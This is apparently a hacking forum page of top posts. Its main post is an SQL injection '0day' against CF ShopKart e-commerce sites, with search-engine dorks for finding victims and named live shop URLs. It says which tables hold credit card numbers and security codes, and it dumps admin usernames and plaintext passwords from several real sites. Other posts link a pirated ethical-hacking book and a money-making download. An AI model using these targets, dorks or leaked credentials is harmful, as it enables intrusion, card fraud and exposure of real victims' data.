Leaderboard

Popular Content

Showing content with the highest reputation on 01/28/12 in Posts

  1. 0Day Exploit 1 - Shopping Cart. # Exploit Title: CF Shopkart Shopping Site Engine [MSAcess&MYSQL SQL Injection] 0day # Date: 12/1/12 # Author: Srblche # Vendor or Software Link: http://www.webstoresltd.com/webstores.cfm and www.cfshopkart.com/ # Version: v4.x.x - v5.x.x # Category:: Webapps # Google dork: inurl:.cfm?Action=ViewDetails + "Website Content for" # Tested on: Windows 7 and Backtrack ## 18,600 results ## EXPLOIT: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=1 [SQLi HERE] Vuln Link: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=29 In Depth Analysis: Most CF ShopKart scripts runs either MSAccess or MYSQLv5 databases. However we can get through both. The admin directory is always located at /admin/ This 0day was made for Srblche. --------------------- TABLE [orders] CONTAINS CREDIT CARD NUMBERS, EXPIRY and SECURITY CODES TABLE [users] CONTAINS ADMIN INFO ADMIN PANEL LINK WILL ALWAYS BE AT [/admin] --------------------- MSACCESS HELP - [+] Table Names of CF ShopKart -- categories checkoutheader companyinfo contacts customerhistory discounts emaillist gallery gallerycats gallerycomments gallerynotes graphics help homepage imagecategories ipcountries links logins options order\_no orderdetails orders --------------------------->> CreditCardType,CreditCardNumber,CreditCardExpire,CCConfirmationNumber pages products promos sales sellingareas sentmessages settings settings2 shippingsurcharges shippingtable1 shippingtable2 shippingtable3 shippingtable4 shippingtable5 shippingtypes shoppingcarts stats stats\_archive storeheader taxes temporders upsconfig users ---------------------------------->> UserID,UserName,Password,UserLevel wishlistitems wishlists -------------------------------------------------------------------------------- https://www.streetsourceleds.com/(secure)/admin//admin.cfm Data Found: UserID,UserName,Password,UserLevel=20^admin^incentives^Admin Data Found: 
UserID,UserName,Password,UserLevel=22^stalerico^kazoo^Admin CVV's in only some orders. -------------------------------------------------------------------------------- https://www.zijagear.com/shop/admin/admin.cfm admin:taylor12 (paypal shop, no cc's found unless setting changed in options to store cc details) -------------------------------------------------------------------------------- EDIT NEW DORK : intext:"Powered by CFShopKart" 1 MORE DORK: inurl:/index.cfm?carttoken= (About 317,000 results (0.37 seconds) http://www.ktlcc.com/handwsportshop.com/shop/admin admin:taylor12 ============================================================= http://www.augersidekick.com Column Data: admin Data Found: username=admin Length of 'Column Data' is 10 Column Data: chrisnmarc Data Found: password=chrisnmarc
    2 points
  2. How I make 100$/week using YouTube and CPA http://www.mediafire.com/?1laa9414t6fn1y3
    1 point
  3. 1 point
  4. September 7, 2011 Product Description Get complete coverage of all the objectives included on the EC-Council's Certified Ethical Hacker Exam inside this comprehensive resource. Written by an IT security expert, this authoritative Guide covers the vendor-neutral CEH Exam in full detail. You'll find learning objectives at the beginning of each chapter, Exam tips, practice Exam questions, and in-depth explanations. Designed to help you pass the Exam with ease, this definitive volume also serves as an essential on-the-job reference. COVERS ALL Exam TOPICS, INCLUDING: Introduction to Ethical hacking; Cryptography; Reconnaissance and footprinting; Network scanning; Enumeration; System hacking; Evasion techniques; Social engineering and physical security; Hacking web servers and applications; SQL injection; Viruses, trojans, and other attacks; Wireless hacking; Penetration testing. CEHv7.rar Download pass:@CanavaroxuM source
    1 point